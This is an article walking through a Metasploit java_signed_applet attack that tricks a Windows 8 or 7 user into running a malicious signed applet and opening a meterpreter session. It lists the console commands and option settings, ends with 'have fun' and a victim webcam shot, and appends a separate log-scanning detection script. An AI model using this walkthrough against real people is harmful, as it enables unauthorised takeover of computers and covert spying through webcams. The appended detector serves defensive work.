Security: Methods to exploit Windows 8 and Windows 7.
By Rafael Fontes (Backtrack Team).
ABSTRACT
Readers, in this article you will learn techniques for exploiting the Microsoft Windows 8 operating system (for teaching purposes only, so that network administrators and security specialists understand how the attacker's mind works and can prevent attacks). Using Metasploit, you will learn how to hack machines running a vulnerable Windows OS; the method also applies to Windows 7 SP1 and other operating systems.
INTRODUCTION
This exploit uses the "Java Signed Applet Method" and works on any browser, but requires the Java plugin to be installed. A ".jar" file is created, and the target must open a URL and allow the Java applet to run in the browser. The applet is presented to the target through a web page. The victim's Java Virtual Machine will pop up a window asking whether they trust the signed applet; after the victim clicks "Run", the applet runs with full permissions.
STEP BY STEP
Requirements for pentest:
I. You must have the Windows 8 operating system installed.
II. A target computer or VMware (virtual machine) with a Linux distribution; it can be Backtrack or Kali, the important thing is to have Metasploit up and running.
First, reader, you need to open the terminal and enter the command: "msfconsole".
Figure 1) Open metasploit.
Next, we choose the exploit to use:
Let's type use exploit/multi/browser/java_signed_applet.
Press Enter and type "show options".
Figure 2) Use exploit and show options.
Essential concepts:
SRVHOST and SRVPORT have default values of 0.0.0.0 and 8080.
SRVHOST is the IP address on which the server listens to serve the URL that the target browser will open. With SRVHOST set to 0.0.0.0, the target must be able to connect to this machine using your public IP.
Figure 3) Set payload.
LHOST should be the IP address that the victim connects to.
Figure 4) LHOST and exploit.
When the target opens this link, their browser displays a warning in a dialog box.
A window will open in which the victim can check "I accept the risk and want to run this application" and click "Run".
Figure 5) Java applet.
FINISHING
After the victim opens the malicious URL and clicks Run, Metasploit will start a meterpreter session to the target machine, and you get full access!
You can run "sessions -l" directly to see the active sessions.
Example: sessions -i 1, where 1 is the ID of the session.
The applet is able to connect to Metasploit.
The Meterpreter session starts and is ready, as planned, with options available for you to exploit the system.
Figure 6) Session starts.
This article is for ethical hacking only; now you can have fun with the commands.
Figure 7) Webcam shot: Just 4 fun.
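For the network administrators this article addresses, the delivery stage described above is visible in web proxy logs: the victim's Java plugin fetches a ".jar" from the server that hosts the applet, which by default listens on port 8080. The following Python script is an added example, not part of the original article or of Metasploit; the log format, the sample lines, the "Java/<version>" user-agent match and the three heuristics are assumptions made for illustration.

```python
import ipaddress
import shlex
from urllib.parse import urlsplit

# Constructed sample in an assumed format: time client method url status "user-agent"
SAMPLE_LOG = """\
2013-05-02T10:01:07Z 10.0.0.21 GET http://192.0.2.50:8080/ 200 "Mozilla/5.0 (Windows NT 6.2; WOW64) Firefox/20.0"
2013-05-02T10:01:09Z 10.0.0.21 GET http://192.0.2.50:8080/app/Loader.jar 200 "Mozilla/4.0 (Windows 8 6.2) Java/1.7.0_17"
2013-05-02T10:03:40Z 10.0.0.34 GET https://intranet.example.com/tools/timesheet.jar 200 "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_17"
2013-05-02T10:04:12Z 10.0.0.34 GET http://198.51.100.7:8080/status.json 200 "curl/7.29.0"
"""

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def applet_load_reasons(url, agent):
    """Reasons a JAR fetched by the JVM itself looks like an ad-hoc applet server."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(".jar") or "Java/" not in agent:
        return []  # not a JAR download made by the Java plugin
    reasons = []
    if is_ip_literal(parts.hostname or ""):
        reasons.append("host is a bare IP address")
    default_port = 443 if parts.scheme == "https" else 80
    if (parts.port or default_port) != default_port:
        reasons.append("non-default port %d" % parts.port)
    if parts.scheme != "https":
        reasons.append("applet delivered over plain HTTP")
    return reasons

def find_suspicious_applet_loads(log_text, min_reasons=2):
    alerts = []
    for line in log_text.splitlines():
        try:
            ts, client, _method, url, _status, agent = shlex.split(line)
            reasons = applet_load_reasons(url, agent)
        except ValueError:
            continue  # blank or malformed line, or unparsable URL/port
        if len(reasons) >= min_reasons:
            alerts.append({"time": ts, "client": client, "url": url, "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for alert in find_suspicious_applet_loads(SAMPLE_LOG):
        print(alert["time"], alert["client"], alert["url"], "; ".join(alert["reasons"]))
```

An alert names the client that loaded the applet, so that workstation can be checked for the outbound session that follows a click on "Run".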